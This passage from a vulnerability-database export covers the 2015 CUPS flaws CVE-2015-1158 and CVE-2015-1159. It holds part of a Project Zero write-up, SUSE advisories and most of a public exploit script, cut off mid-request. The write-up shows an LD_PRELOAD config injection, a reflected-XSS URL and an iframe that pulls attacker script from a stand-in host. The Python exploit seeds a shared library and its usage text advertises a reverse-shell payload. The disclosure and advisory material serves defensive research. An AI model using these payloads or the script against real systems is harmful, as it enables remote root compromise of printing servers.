Yes\n\nMaxClients 1024\n\n<Location />\n\nAllow from *\n\nOrder deny,allow\n\n</Location>\n\n<Policy default>\n\nJobPrivateAccess default\n\nJobPrivateValues default\n\nSubscriptionPrivateAccess default\n\nSubscriptionPrivateValues default\n\n<Limit All>\n\nOrder deny,allow\n\n</Limit>\n\n</Policy>\n\n<Policy authenticated>\n\nJobPrivateAccess default\n\nJobPrivateValues default\n\nSubscriptionPrivateAccess default\n\nSubscriptionPrivateValues default\n\n<Limit All>\n\nOrder deny,allow\n\n</Limit>\n\n</Policy>\n\n<Policy kerberos>\n\nJobPrivateAccess default\n\nJobPrivateValues default\n\nSubscriptionPrivateAccess default\n\nSubscriptionPrivateValues default\n\n<Limit All>\n\nOrder deny,allow\n\n</Limit>\n\n</Policy>\n\nSetEnv LD_PRELOAD /var/spool/cups/000000ff\n\n## Seeding Library Files on Disk\n\n \n\n\nTo use 'SetEnv' to run code, I need to be able to write a shared library to disk, and do so in a predictable location. Cupsd stores POST bodies to disk in the 'RequestRoot' directory (on MacOS X '/private/var/spool/cups/', on Linux '/var/spool/cups'). The full filename is constructed as follows in 'cupsdReadClient()':\n\n \n\n\nscheduler/client.c:2116:\n\n \n\n\ncupsdSetStringf(&con->filename, \"%s/%08x\", RequestRoot,\n\nrequest_id ++);\n\ncon->file = open(con->filename, O_WRONLY | O_CREAT | O_TRUNC, 0640);\n\n \n\n\nWhere 'request_id' is a static integer, counting up from 0 for the lifetime of the process. This introduces some uncertainty into the filenames, but this can be countered by sending many POST requests.\n\n \n\n\nWhen a POST request is completely received, the request is processed and the temporary file is deleted. However, if the client closes the connection before cupsd receives the entire POST body, the files linger on disk.\n\n \n\n\nOn Mac OS X Yosemite with cups-2.0.2, this exploitation method yields root privileges. On some older versions of cups, and on Linux, this technique will yield execution as the 'lp' or '_lp' user.\n\n# Background on IPP (really just HTTP)\n\n \n\n\nFor the purposes of exploitation, IPP is really just HTTP.\n\n \n\n\nRFC 2910, \"Internet Printing Protocol/1.1: Encoding and Transport\", states the following in Section 4:\n\n \n\n\nHTTP/1.1 [RFC2616] is the transport layer for this protocol.\n\n \n\n\nand\n\n \n\n\nIt is REQUIRED that a printer implementation support HTTP over the\n\nIANA assigned Well Known Port 631 (the IPP default port), though a\n\nprinter implementation may support HTTP over some other port as well.\n\n \n\n\nCupsd listens on TCP/631, and answers HTTP requests with its own full-featured HTTP server implementation. This includes a full CGI implementation, and a basic template implementation.\n\n \n\n\n## Attack Surface Reduction in CUPS\n\n \n\n\nOn desktop machines, cupsd typically listens on a loopback interface, and is not remotely accessible, at least not directly:\n\n \n\n\n# Only listen for connections from the local machine.\n\nListen localhost:631\n\n \n\n\nThe HTTP features required for basic printing are logically separated from less essential functions, like CGI applications, by the 'WebInterface' configuration setting.\n\n \n\n\nMany Linux distributions ship with the web interface enabled, and as a result expose significantly more attack surface. Here's the setting from /etc/cups/cupsd.conf on Ubuntu 14.10:\n\n \n\n\n# Web interface setting...\n\nWebInterface Yes\n\n \n\n\nBy default on Mac OS X, the web interface is disabled:\n\n \n\n\n# Web interface setting...\n\nWebInterface No\n\n# XSS and IPP\n\n## CUPS Template Basics\n\n \n\n\nCUPS CGI applications use a simple, custom templating engine for HTML. It substitutes CGI arguments into templates, and supports some basic conditional statements. Here's an example of how it is used, from cgi-bin/jobs.c:93:\n\n \n\n\n/*\n\n* Bad operation code... Display an error...\n\n*/\n\n \n\n\ncgiStartHTML(cgiText(_(\"Jobs\")));\n\ncgiCopyTemplateLang(\"error-op.tmpl\");\n\ncgiEndHTML();\n\n \n\n\nThe template 'error-op.tmpl' has the following contents:\n\n \n\n\n<H2 CLASS=\"title\">{?title} {?printer_name} Error</H2>\n\n \n\n\n<P>Error:</P>\n\n \n\n\n<BLOCKQUOTE>Unknown operation \"{op}\"!</BLOCKQUOTE>\n\n \n\n\nSubstitutions are made from CGI arguments denoted in '{braces}'.\n\n## A Reflected XSS in the Web Interface (CVE-2015-1159)\n\n \n\n\nThe template engine is only vaguely context-aware, and only supports HTML. Template parsing and variable substitution and escaping are handled in 'cgi_copy()'.\n\n \n\n\nThe template engine has 2 special cases for 'href' attributes from HTML links. The first case 'cgi_puturi()' is unused in current templates, but the second case ends up being interesting.\n\n \n\n\nThe code is found in 'cgi_puts()', and escapes the following reserved HTML characters:\n\n<>\"'&\n\n \n\n\nThese are replaced with their HTML entity equivalents ('&lt;' etc...).\n\n \n\n\nThe function contains a curious special case to deal with HTML links in variable values. Here is a code snippet, from cgi-bin/template.c:650:\n\n \n\n\nif (*s == '<')\n\n{\n\n/*\n\n* Pass <A HREF=\"url\"> and </A>, otherwise quote it...\n\n*/\n\n \n\n\nif (!_cups_strncasecmp(s, \"<A HREF=\\\"\", 9))\n\n{\n\nfputs(\"<A HREF=\\\"\", out);\n\ns += 9;\n\n \n\n\nwhile (*s && *s != '\\\"')\n\n{\n\nif (*s == '&')\n\nfputs(\"&amp;\", out);\n\nelse\n\nputc(*s, out);\n\n \n\n\ns ++;\n\n}\n\n \n\n\nif (*s)\n\ns ++;\n\n \n\n\nfputs(\"\\\">\", out);\n\n}\n\n \n\n\nFor variable values containing '<a href=\"', all subsequent characters before a closing double-quote are subject to less restrictive escaping, where only the '&' character is escaped. The characters <>', and a closing \" would normally be escaped, but are echoed unaltered in this context.\n\n \n\n\nNote that the data being escaped here is client-supplied input, the variable value from the CGI argument. This code may have been intended to deal with links passed as CGI arguments. However, the template engine's limited context-awareness becomes an issue.\n\n \n\n\nTake this example from templates/help-header.tmp:19:\n\n \n\n\n<P CLASS=\"l0\"><A HREF=\"/help/{QUERY??QUERY={QUERY}:}\">All Documents</A></P>\n\n \n\n\nIn this case, the CGI argument 'QUERY' is already contained inside a 'href' attribute of a link. If 'QUERY' starts with '<a href=\"', the double-quote will close the 'href' attribute opened in the static portion of the template. The remainder of the 'QUERY' variable will be interpreted as HTML tags.\n\n \n\n\nRequesting the following URI will demonstrate this reflected XSS:\n\nhttp://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%3Ealert%28%27Linux%20crickets%20chirping%20for%20a%20patch%27%29%3C/script%3E%3C!--&SEARCH=Search\n\n \n\n\nThe 'QUERY' parameter is included in the page twice, leading to multiple unbalanced double-quotes. As such, the open comment string '<!--' is used to yield a HTML page that parses without errors.\n\n \n\n\n## Reaching Otherwise Unreachable Schedulers\n\n \n\n\nThis reflected XSS can be used to inject attacker-supplied Javascript cross-origin, bootstrapping exploitation of the string reference count vulnerability for CUPS scheduler instances not directly reachable via the network. For example, CUPS instances bound only to a localhost interface can be exploited when a target user browses the web.\n\n \n\n\nFirst, I'll try to fetch a page protected by ACL's, to demonstrate the default state. I get an HTTP 403 and an authentication prompt, as expected:\n\n \n![auth_prompt_get_conf.png](https://lh6.googleusercontent.com/kDFuTMy2wLtQoZEBmW_1C7wTav_jYKKCTqaC6khQlUOFaKj3xFXACKyW45xjak3pfOn6hgcpJq1U_-8nfjNq30CiINo2LadN1fvuOiyo6Ci6Y2sG08uKxZZE0NIvxI1tOBt-Pzk) \n\n\n \n\n\nI see that my ACL's are working:\n\n \n![unauth_get_conf.png](https://lh3.googleusercontent.com/FqjCupk21erYE9TX4Pmdpy_J7HHc5C6P2RfLP8_W382l8u07q1dsY0SmKJ8sLiZkr0buyf9LQ_atZbCwLZoPBPIluQDqJC0JeqsVMBCNcVqq-GhdnFnmw-Jg_Hv6Tiemlv_Xgso) \n\n\n \n\n\nNow, the target user browses the web to some site they're interested in. This site contains an attacker-supplied iframe that triggers the reflected XSS:\n\n \n\n\n<html>\n\n<head>\n\n<title>Right Ho, Jeeves</title>\n\n</head>\n\n<body>\n\n<img src=\"triturus_cristatus.jpg\" width=\"200\" height=\"200\">\n\n<iframe src=\"http://localhost:631/help/?QUERY=%3Ca%20href=%22%20%3E%3Cscript%20src=%27http://test.evildomain/dronesclub.js%27%3E%3C/script%3E%3C!--&SEARCH=Search\" width=\"1024\" height=\"500\" tabindex=\"-1\" title=\"nothiddeniframe\">\n\n</body>\n\n</html>\n\n \n\n\nTypically, this would be a hidden iframe, but in this case I visually display exploit debugging output, replacing 'document.body' (it was originally the CUPS help CGI output, which is ironically less informative in this case):\n\n \n![exploit_ran_newt_page.png](https://lh3.googleusercontent.com/cJKskGWqyeU3WQKuEdCxdyvuJoqBK2lyPBO8VDO8in3ECE_1fKYaoohIGyJi7Fioew1uF4egdxf-14WGEgaxMraITRaTE4SL0vExPyMQjZdaZb0HlA1igKCrSOfkrGP485AiZak) \n\n\n \n\n\nAt this point, I have run attacker-supplied javascript in the 'localhost:631' origin, and issued HTTP / IPP requests to exploit the reference count over-decrement bug. To determine if CUPS is owned, I reload the config file page, from the first screen capture. As you can see, I've now successfully exploited a localhost-bound CUPS as the target browses the web. The target (me) is unlikely to have noticed:\n\n \n\n\n![post_get_conf.png](https://lh3.googleusercontent.com/SyggseDRTHXdeKtx6vRL9SJMr03GresCM-PQPQemcba3_EsW-nuQN9aiQJyv281RbO2FiI8C0C1jH7Ucxzlq6sKcwnIsv-L7l-gYpdM5n2Du0cfn7sik6MnDVMSQDnY9pDsBC20) \n\n\n# Factors Affecting Scope and Impact\n\n \n\n\n## Vulnerability Lifetimes\n\n \n\n\nThe string reference count bug was introduced in CUPS 1.2.0, released mid-2006. All versions since are affected. Given the large number of affected versions, the vast majority of live unpatched CUPS installations contain the vulnerable code. A similar bug, a vanilla double-free, is present in the earliest available CUPS 1.0 versions.\n\n \n\n\nThe introduction of the 'WebInterface' configuration setting in CUPS 1.5.0 influences reachability on Mac OS X by default, but not on Linux.\n\n## Printer Configuration\n\n \n\n\nIn its initial install state, CUPS does not have a printer installed or configured, a prerequisite for exploitation. Some systems are unlikely to ever have a printer configured. Adding a printer is a privileged operation, and cannot be accomplished without authentication.\n\n \n\n\nTo add a printer, a CUPS user must have permission to perform the 'CUPS-Add-Modify-Printer' operation. From any TCP/IP socket connection to cupsd, this requires user credentials on the target machine. CUPS also listens on a Unix domain socket, where adding a printer is implicitly authenticated by the underlying socket.\n\n \n\n\nThe following configuration directive from '/etc/cups/cupsd.conf' prevents remotely adding a new printer without authenticating:\n\n \n\n\n<Limit CUPS-Add-Modify-Printer CUPS-Delete-Printer CUPS-Add-Modify-Class CUPS-Delete-Class CUPS-Set-Default CUPS-Get-Devices>\n\nAuthType Default\n\nRequire user @SYSTEM\n\nOrder deny,allow\n\n</Limit>\n\n \n\n\nWhen a machine prints to a network printer, or shares a locally-attached printer with other computers on a network, a printer will be configured with CUPS. For example, the printer configuration setup UI in the Mac OS X settings pane adds printers to CUPS. If a user has never added a printer or printed anything, they will be unaffected.\n\n \n\n\n## Lack of Chroot, and Minimal Sandboxing\n\n \n\n\nThe string reference count vulnerability is triggered in code that runs as 'root'. CUPS launches sub-processes via 'cups-exec', which acts as an interstitial for CGI scripts, and creates a sandbox profile on Mac OS X. On Linux, no sandboxing is used.\n\n \n\n\n## Print Permissions\n\n \n\n\nIn order to exploit the vulnerability, the exploit must be delivered from a machine permitted to print. This is strictly defined as having permission to send POST requests to cupsd, and the permission to perform the 'Create-Job' or 'Print-Job' operation.\n\n \n\n\nThe ability to send any POST requests to cupsd may be restricted by the following configuration directive from '/etc/cups/cupsd.conf':\n\n \n\n\n# Restrict access to the server...\n\n<Location /> \u2190 ACL for path /\n\nOrder allow,deny\n\n</Location>\n\n \n\n\nPOST requests to '/printers/*' match this restriction, which defaults to 'deny'.\n\n \n\n\nRequests to print from 'localhost' are allowed irrespective of configuration. When a machine is purpose-configured as a network print server, an 'Allow' directive would have to be added to the 'Location' directive above to allow any network printing. For more information, see:\n\n[http://cups.org/documentation.php/doc-2.0/policies.html](<http://cups.org/documentation.php/doc-2.0/policies.html>)\n\n \n\n\nAs for the permission to 'Create-Job' or 'Print-Job', these operations aren't restricted in the default configuration:\n\n \n\n\n<Limit Create-Job Print-Job Print-URI Validate-Job>\n\nOrder deny,allow\n\n</Limit>\n\n \n\n\n## Printer Names\n\n \n\n\nIn order to craft input to exploit this vulnerability, the name of a configured printer must be known to an attacker. Printer names are not sensitive information, and can be incidentally exposed via other CUPS components like the browser. Knowing a printer name is a basic requirement to print anything.\n\n \n\n\nIf the attacker does not know a printer name from some other means, the names of all printers on a machine can be retrieved via the 'CUPS-Get-Printers' operation. This operation is not explicitly mentioned in the default configuration file, and therefore is not explicitly restricted (similar to 'Create-Job' or 'Print-Job').\n\n \n\n\n## Browsers Can Talk IPP\n\n \n\n\nThe same-origin policy is an important security barrier that prevents an attacker from meaningfully-interacting directly with cupsd while a user browses the web.\n\n \n\n\nUsers who have the CUPS 'WebInterface' disabled are not susceptible to the specific reflected XSS issue.\n\n \n\n\nIn theory, universal XSS bugs in browser components could be used in place of this specific XSS to exploit otherwise-unreachable CUPS instances. Ultimately, this is simply to be expected, since IPP is just HTTP at the transport layer.\n\n \n\n\nExcluding same-origin policy restrictions, an attacker could exploit this vulnerability with standard features of the XMLHTTPRequest class in browsers.\n\n \n\n\nA universal XSS could theoretically exploit this bug if it allowed an attacker to do the following:\n\n * Send POST requests cross-origin to localhost:631.\n\n * Specify binary contents in the POST bodies.\n\n * Set the 'Content-Type' header to 'application/ipp'.\n\n * Receive the response body contents from the cupsd server.\n\n \n\n\n## Browser XSS Inspectors\n\n \n\n\nSome browsers, such as Chrome, contain detection for reflected XSS attacks. These features look for client request content that is echoed back verbatim in a server's reply. In general, these XSS detectors are not considered a credible security barrier, but rather a defense-in-depth mechanism. In this case, they appear effective, at least for some templates.\n\n## CUPS and Browser Sandboxes\n\n \n\n\nMany browser sandboxes provide a privileged supervisor that performs HTTP requests on behalf of a unprivileged (potentially untrusted) child process. When enforcement of same-origin-policy restrictions is left to the child process, a compromised child could request that the supervisor send HTTP POST requests to 'cupsd' locally, exploiting it and breaking out of the sandbox.\n\n## CUPS May be Used in Unexpected Places\n\n \n\n\nThe exposure of CUPS running on desktop and network print servers is discussed at length, and easily anticipated and patched. However, CUPS may be embedded in unexpected places, where one might not even think to patch them.\n\n \n\n\nFor example, CUPS has been adapted for use in OpenWRT:\n\n[http://wiki.openwrt.org/doc/howto/cups.server](<http://wiki.openwrt.org/doc/howto/cups.server>)\n\n \n\n\n## Disabling the Web Interface\n\n \n\n\nThe CUPS web interface can be disabled by the 'WebInterface' configuration setting. This is a significant attack-surface reduction, and already the default on Mac OS X. Disabling it manually is required for Linux systems:\n\n \n\n\n# Web interface setting...\n\nWebInterface No\n\n# Upstream Fixes\n\n \n\n\nApple Fix (April 16, 2015):\n\n[https://support.apple.com/kb/DL1807](<https://support.apple.com/kb/DL1807>)\n\n \n\n\nOfficial CUPS fix for downstream vendors (June 8, 2015):\n\n[https://www.cups.org/str.php?L4609](<https://www.cups.org/str.php?L4609>)\n\n[http://www.cups.org/blog.php?L1082+I0+Q](<http://www.cups.org/blog.php?L1082+I0+Q>)\n\n \n\n\n# Project Zero Bug\n\n \n\n\nFor those interested, the sample exploit can be [found here](<https://code.google.com/p/google-security-research/issues/detail?id=455>).\n\n# Disclosure Timeline\n\n \n\n\n * March 20th, 2015 - Initial notification to Apple\n\n * April 16th, 2015 - Apple ships fix in Mac OS X 10.10.3\n\n * June 8th, 2015 - CUPS ships official fix in CUPS 2.0.3\n\n * June 18th, 2015 - Disclosure + 90 days\n\n * June 19th, 2015 - P0 publication\n\n \n\n\n# Attack Surface Reduction in CUPS 2.0.3+\n\n \n\n\nCUPS 2.0.3 and 2.1 beta contains several prescient implementation changes to limit the risk and impact of future similar bugs:\n\n \n\n\n * Configuration value strings are now logically separated from the string pool, allocated by strdup() instead.\n\n * LD_* and DYLD_* environment variables are blocked when CUPS is running as root.\n\n * The localhost listener is removed when 'WebInterface' is disabled (2.1 beta only).\n\n# Acknowledgements\n\n \n\n\nThanks to Ben Hawkes, Stephan Somogyi, and Mike Sweet for their comments and edits.\n\n# Conclusion\n\n \n\n\nNo one prints anything anymore anyways.\n", "modified": "2015-06-19T00:00:00", "published": "2015-06-19T00:00:00", "id": "GOOGLEPROJECTZERO:5311581F0C084F98DDCD44AEF83A28A7", "href": "https://googleprojectzero.blogspot.com/2015/06/owning-internet-printing-case-study-in.html", "type": "googleprojectzero", "title": "\nOwning Internet Printing - A Case Study in Modern Software Exploitation\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T12:36:14", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "description": "The following issues are fixed by this update:\n\n * CVE-2012-5519: privilege escalation via cross-site scripting and bad\n print job submission used to replace cupsd.conf on server (bsc#924208).\n * CVE-2015-1158: Improper Update of Reference Count\n * CVE-2015-1159: Cross-Site Scripting\n\n", "edition": 1, "modified": "2015-06-11T19:04:58", "published": "2015-06-11T19:04:58", "id": "SUSE-SU-2015:1044-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00006.html", "type": "suse", "title": "Security update for cups154 (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:47:49", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "description": "The following issues are fixed by this update:\n\n * CVE-2012-5519: privilege escalation via cross-site scripting and bad\n print job submission used to replace cupsd.conf on server (bsc#924208).\n * CVE-2015-1158: Improper Update of Reference Count\n * CVE-2015-1159: Cross-Site Scripting\n\n", "edition": 1, "modified": "2015-06-11T20:06:22", "published": "2015-06-11T20:06:22", "id": "SUSE-SU-2015:1044-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00008.html", "title": "Security update for cups154 (critical)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:30:36", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "description": "This update fixes the following issues:\n\n - CVE-2015-1158 and CVE-2015-1159 fixes a possible privilege escalation\n via cross-site scripting and bad print job submission used to replace\n cupsd.conf on server (CUPS STR#4609 CERT-VU-810572 CVE-2015-1158\n CVE-2015-1159 bugzilla.suse.com bsc#924208). In general it is crucial to\n limit access to CUPS to trustworthy users who do not misuse their\n permission to submit print jobs which means to upload arbitrary data\n onto the CUPS server, see\n <a rel=\"nofollow\" href=\"https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings\">https://en.opensuse.org/SDB:CUPS_and_SANE_Firewall_settings</a> and cf. the\n entries about CVE-2012-5519 below.\n\n", "edition": 1, "modified": "2015-06-12T21:05:05", "published": "2015-06-12T21:05:05", "id": "OPENSUSE-SU-2015:1056-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00010.html", "type": "suse", "title": "Security update for cups (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:26:30", "bulletinFamily": "unix", "cvelist": ["CVE-2015-1158", "CVE-2012-5519", "CVE-2015-1159"], "description": "The following issues are fixed by this update:\n\n * CVE-2012-5519: privilege escalation via cross-site scripting and bad\n print job submission used to replace cupsd.conf on server (bsc#924208).\n * CVE-2015-1158: Improper Update of Reference Count\n * CVE-2015-1159: Cross-Site Scripting\n\n", "edition": 1, "modified": "2015-06-11T17:05:04", "published": "2015-06-11T17:05:04", "id": "SUSE-SU-2015:1041-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-06/msg00003.html", "type": "suse", "title": "Security update for cups (critical)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-08T23:03:57", "description": "Exploit for linux platform in category remote exploits", "edition": 1, "published": "2017-02-03T00:00:00", "title": "CUPS 2.0.3 - Remote Command Execution Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1158"], "modified": "2017-02-03T00:00:00", "href": "https://0day.today/exploit/description/26891", "id": "1337DAY-ID-26891", "sourceData": "#!/usr/bin/python\r\n# Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution\r\n# Google Dork: n/a\r\n# Date: 2/2/17\r\n# Exploit Author: @0x00string\r\n# Vendor Homepage: cups.org\r\n# Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2\r\n# Version: <2.0.3\r\n# Tested on: Ubuntu 14/15\r\n# CVE : CVE-2015-1158\r\nimport os, re, socket, random, time, getopt, sys\r\nfrom socket import *\r\nfrom struct import *\r\n \r\ndef banner():\r\n print '''\r\n lol ty google\r\n 0000000000000\r\n 0000000000000000000 00\r\n 00000000000000000000000000000\r\n 0000000000000000000000000000000\r\n 000000000 0000000000\r\n 00000000 0000000000\r\n 0000000 000000000000\r\n 0000000 000000000000000\r\n 000000 000000000 000000\r\n0000000 000000000 000000\r\n000000 000000000 000000\r\n000000 000000000 000000\r\n000000 00000000 000000\r\n000000 000000000 000000\r\n0000000 000000000 0000000\r\n 000000 000000000 000000\r\n 0000000000000000 0000000\r\n 0000000000000 0000000\r\n 00000000000 00000000\r\n 00000000000 000000000\r\n 0000000000000000000000000000000\r\n 00000000000000000000000000000\r\n 000 0000000000000000000\r\n 0000000000000\r\n @0x00string\r\ngithub.com/0x00string/oldays/CVE-2015-1158.py\r\n'''\r\n \r\ndef usage ():\r\n print (\"python script.py <args>\\n\"\r\n \" -h, --help: Show this message\\n\"\r\n \" -a, --rhost: Target IP address\\n\"\r\n \" -b, --rport: Target IPP service port\\n\"\r\n \" -c, --lib /path/to/payload.so\\n\"\r\n \" -f, --stomp-only Only stomp the ACL (no postex)\\n\"\r\n \"\\n\"\r\n \"Examples:\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -f\\n\"\r\n \"python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\\n\")\r\n exit()\r\n \r\ndef pretty (t, m):\r\n if (t is \"+\"):\r\n print \"\\x1b[32;1m[+]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"-\"):\r\n print \"\\x1b[31;1m[-]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"*\"):\r\n print \"\\x1b[34;1m[*]\\x1b[0m\\t\" + m + \"\\n\",\r\n elif (t is \"!\"):\r\n print \"\\x1b[33;1m[!]\\x1b[0m\\t\" + m + \"\\n\",\r\n \r\ndef createDump (input):\r\n d, b, h = '', [], []\r\n u = list(input)\r\n for e in u:\r\n h.append(e.encode(\"hex\"))\r\n if e == '0x0':\r\n b.append('0')\r\n elif 30 > ord(e) or ord(e) > 128:\r\n b.append('.')\r\n elif 30 < ord(e) or ord(e) < 128:\r\n b.append(e)\r\n \r\n i = 0\r\n while i < len(h):\r\n if (len(h) - i ) >= 16:\r\n d += ' '.join(h[i:i+16])\r\n d += \" \"\r\n d += ' '.join(b[i:i+16])\r\n d += \"\\n\"\r\n i = i + 16\r\n else:\r\n d += ' '.join(h[i:(len(h) - 0 )])\r\n pad = len(' '.join(h[i:(len(h) - 0 )]))\r\n d += ' ' * (56 - pad)\r\n d += ' '.join(b[i:(len(h) - 0 )])\r\n d += \"\\n\"\r\n i = i + len(h)\r\n \r\n return d\r\n \r\nclass tcpsock:\r\n def __init__(self, sock=None):\r\n if sock is None:\r\n self.sock = socket(\r\n AF_INET, SOCK_STREAM)\r\n self.sock.settimeout(30)\r\n else:\r\n self.sock = sock\r\n def connect(self, host, port):\r\n self.sock.connect((host, int(port)))\r\n def tx(self, msg):\r\n self.sock.send(msg)\r\n def rx(self):\r\n tmp = self.sock.recv(1024)\r\n msg = \"\"\r\n while tmp:\r\n msg += tmp\r\n tmp = self.sock.recv(1024)\r\n return msg\r\n \r\ndef txrx (ip, port, proto, txpacket):\r\n if (proto is \"tcp\"):\r\n sock = tcpsock()\r\n elif (proto is \"udp\"):\r\n sock = udpsock()\r\n else:\r\n return None\r\n sock.connect(ip, port)\r\n sock.tx(txpacket)\r\n rxpacket = sock.rx()\r\n return rxpacket\r\n \r\ndef locatePrinters(rhost, rport=\"631\"):\r\n request = ( \"GET /printers HTTP/1.1\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + rport + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n response = txrx(rhost, int(rport), \"tcp\", request)\r\n if response is not None:\r\n m = re.search('<TR><TD><A HREF=\"(.+)\">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)\r\n if m is not None:\r\n printer = m.group(1)\r\n pretty(\"+\",\"printer found: \" + printer)\r\n else:\r\n pretty(\"-\",\"no printers\")\r\n exit(1)\r\n return printer\r\n \r\ndef preparePayload(libpath):\r\n with open(libpath, 'rb') as f:\r\n payload = f.read()\r\n if payload is not None:\r\n pretty(\"*\",\"Payload:\\n\" + createDump(payload))\r\n else:\r\n pretty(\"-\",\"something went wrong\")\r\n usage()\r\n return payload\r\n \r\ndef seedTarget(rhost, rport, printer, payload):\r\n i = random.randint(1,3)\r\n reqid = str(pack(\">i\",(i+2)))\r\n reqid2 = str(pack(\">i\",(i+3)))\r\n printer_uri = \"ipp://\" + rhost + \":\" + str(rport) + printer\r\n \r\n create_job_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x05\"+\r\n reqid+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x08\"+\"job-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x02\"\r\n \"\\x21\"+\"\\x00\\x06\"+\"copies\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x23\"+\"\\x00\\x0a\"+\"finishings\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x03\"\r\n \"\\x42\"+\"\\x00\\x10\"+\"job-cancel-after\"+\"\\x00\\x05\"+\"\\x31\\x30\\x38\\x30\\x30\"\r\n \"\\x44\"+\"\\x00\\x0e\"+\"job-hold-until\"+\"\\x00\\x0a\"+\"indefinite\"\r\n \"\\x21\"+\"\\x00\\x0c\"+\"job-priority\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x32\"\r\n \"\\x42\"+\"\\x00\\x0a\"+\"job-sheets\"+\"\\x00\\x04\"+\"none\"+\"\\x42\"+\"\\x00\\x00\\x00\\x04\"+\"none\"\r\n \"\\x21\"+\"\\x00\\x09\"+\"number-up\"+\"\\x00\\x04\"+\"\\x00\\x00\\x00\\x01\"\r\n \"\\x03\")\r\n pretty(\"*\",\"Sending createJob\")\r\n \r\n http_header1 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: \" + str(len(create_job_packet) + 0) + \"\\x0d\\x0a\"\r\n \"\\x0d\\x0a\")\r\n \r\n createJobRequest = http_header1 + create_job_packet\r\n blah = txrx(rhost,int(rport),\"tcp\",createJobRequest)\r\n if blah is not None:\r\n m = re.search(\"ipp://\" + rhost + \":\" + str(rport) + \"/jobs/(\\d+)\",blah)\r\n if m is not None:\r\n jobid = m.group(1)\r\n else:\r\n pretty(\"-\",\"something went wrong\");\r\n exit()\r\n \r\n pretty(\"*\",\"\\n\" + createDump(blah) + \"\\n\")\r\n pretty(\"*\", \"Sending sendJob\")\r\n \r\n send_document_packet = (\"\\x02\\x00\"\r\n \"\\x00\\x06\"+\r\n reqid2+\r\n \"\\x01\"\r\n \"\\x47\"+\"\\x00\\x12\"+\"attributes-charset\"+\"\\x00\\x05\"+\"utf-8\"\r\n \"\\x48\"+\"\\x00\\x1b\"+\"attributes-natural-language\"+\"\\x00\\x05\"+\"en-us\"\r\n \"\\x45\"+\"\\x00\\x0b\"+\"printer-uri\" + str(pack(\">h\", len(printer_uri))) + printer_uri +\r\n \"\\x21\"+\"\\x00\\x06\"+\"job-id\"+\"\\x00\\x04\"+ str(pack(\">i\", int(jobid))) +\r\n \"\\x42\"+\"\\x00\\x14\"+\"requesting-user-name\"+\"\\x00\\x04\"+\"root\"\r\n \"\\x42\"+\"\\x00\\x0d\"+\"document-name\"+\"\\x00\\x06\"+\"badlib\"\r\n \"\\x49\"+\"\\x00\\x0f\"+\"document-format\"+\"\\x00\\x18\"+\"application/octet-stream\"\r\n \"\\x22\"+\"\\x00\\x0d\"+\"last-document\"+\"\\x00\\x01\"+\"\\x01\"\r\n \"\\x03\"+\r\n payload)\r\n \r\n http_header2 = ( \"POST \" + printer + \" HTTP/1.1\\x0d\\x0a\"\r\n \"Content-Type: application/ipp\\x0d\\x0a\"\r\n \"Host: \" + rhost + \":\" + str(rport) + \"\\x0d\\x0a\"\r\n \"User-Agent: CUPS/2.0.2\\x0d\\x0a\"\r\n \"Connection: Close\\x0d\\x0a\"\r\n \"Content-Length: 